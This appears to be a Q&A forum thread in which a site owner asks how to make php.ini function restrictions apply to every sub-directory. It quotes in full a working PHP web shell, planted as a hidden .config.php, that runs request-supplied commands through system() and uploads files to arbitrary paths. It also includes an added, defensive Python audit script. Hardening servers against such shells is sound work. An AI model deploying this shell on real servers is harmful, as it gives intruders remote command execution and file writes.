A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

<?php

if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

<?php
if (isset($_REQUEST['upload'])) {
    echo '
<form enctype="multipart/form-data" action=".config.php?send" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
Send this file: <input name="userfile" type="file" />
To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
<input type="submit" value="Send File" />
</form>';
}
?>

<?php
if (isset($_REQUEST['send'])) {
    $uploaddir = $_POST["direct"];
    $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
        echo "File is valid, and was successfully uploaded.\n";
        echo $uploaddir;
    } else {
        echo "Upload failed";
    }
}

?>

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?
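
An added example, not part of the original question or its answers: a Python audit that lists every directory under a web root that holds .php files but is not hardened by its own php.ini, modelling the per-directory behaviour described above. The function names, the constructed sample tree and the default `required` list are assumptions made for illustration.

```python
import os
import re
import tempfile

# Matches "disable_functions = a, b" in a php.ini; ";" starts a comment.
_DIRECTIVE = re.compile(r'^\s*disable_functions\s*=\s*"?([^";]*)', re.I)

def disabled_functions(ini_path):
    """Return the set named by the last disable_functions line in ini_path."""
    names = set()
    with open(ini_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            m = _DIRECTIVE.match(line)
            if m:  # a later assignment replaces an earlier one
                names = {n.strip().lower() for n in m.group(1).split(",") if n.strip()}
    return names

def uncovered_dirs(docroot, required=("system",)):
    """Directories holding .php files whose own php.ini does not disable `required`.

    Assumption taken from the question: a php.ini applies only to the
    directory it sits in, never to sub-directories.
    """
    missing = []
    for path, _dirs, files in os.walk(docroot):
        if not any(f.lower().endswith(".php") for f in files):
            continue  # nothing executable by PHP here
        ini = os.path.join(path, "php.ini")
        have = disabled_functions(ini) if os.path.isfile(ini) else set()
        if not set(required) <= have:
            missing.append(os.path.relpath(path, docroot).replace(os.sep, "/"))
    return sorted(missing)

def demo(required=("system",)):
    """Constructed sample tree: only the top level carries a hardened php.ini."""
    with tempfile.TemporaryDirectory() as root:
        for sub in ("blog", "blog/uploads", "static"):
            os.makedirs(os.path.join(root, sub), exist_ok=True)
        with open(os.path.join(root, "php.ini"), "w") as fh:
            fh.write("; constructed sample\ndisable_functions = system, exec\n")
        with open(os.path.join(root, "blog", "php.ini"), "w") as fh:
            fh.write("memory_limit = 64M\n")  # present, but hardens nothing
        for rel in ("index.php", "blog/index.php", "blog/uploads/.config.php"):
            open(os.path.join(root, rel), "w").close()
        return uncovered_dirs(root, required)

if __name__ == "__main__":
    print(demo())
```

Once a single server-wide php.ini is in force, an empty result from the same walk is no longer required; the script is only meaningful while per-directory files are what applies.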

+1  A: 

One, kick off a "friend" that chooses to run scripts like this.

Then worry about securing your server. Your system has a master php.ini somewhere (often /etc/php.ini, but it can be in several places, check php_info()). That file controls the default settings for your server. Also, you can block local settings files that allow overrides.

acrosman
My phpinfo() command is returning Configuration File (php.ini) Path /usr/lib; Loaded Configuration File /usr/local/lib/php.ini, but neither of these directories has a php.ini file in it.
PHLAK
It could be running off defaults. Copy a php.ini file into /usr/local/lib and see if it takes over as master. I believe it should.
acrosman
+1  A: 

Wow! Move the php.ini file on a per-directory basis? Didn't know you could do that.

My best guess (someone please correct me if I'm wrong): PHP probably overrides the global php.ini file with a local set of rules on a per-directory basis (much like .htaccess), so basically all you would need to do is to update your php.ini directives to the global php.ini (found here in Ubuntu: etc/php5/apache2/php.ini).

Alternatively, you might want to try to use .htaccess to prepend a PHP page onto all pages with the following:

ini_set('your_directive')

Of course, make sure the .htaccess which calls the prepend php sits at the root, else you're stuck with the same issue.

/mp

mauriciopastrana
A: 

Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.

PHLAK
A: 

Are you sure? I wish I had your ISP. By default some ISPs will provide a local copy of the ini file in public_html to allow overrides. But cPanel usually only provides a reference of the server-wide defaults.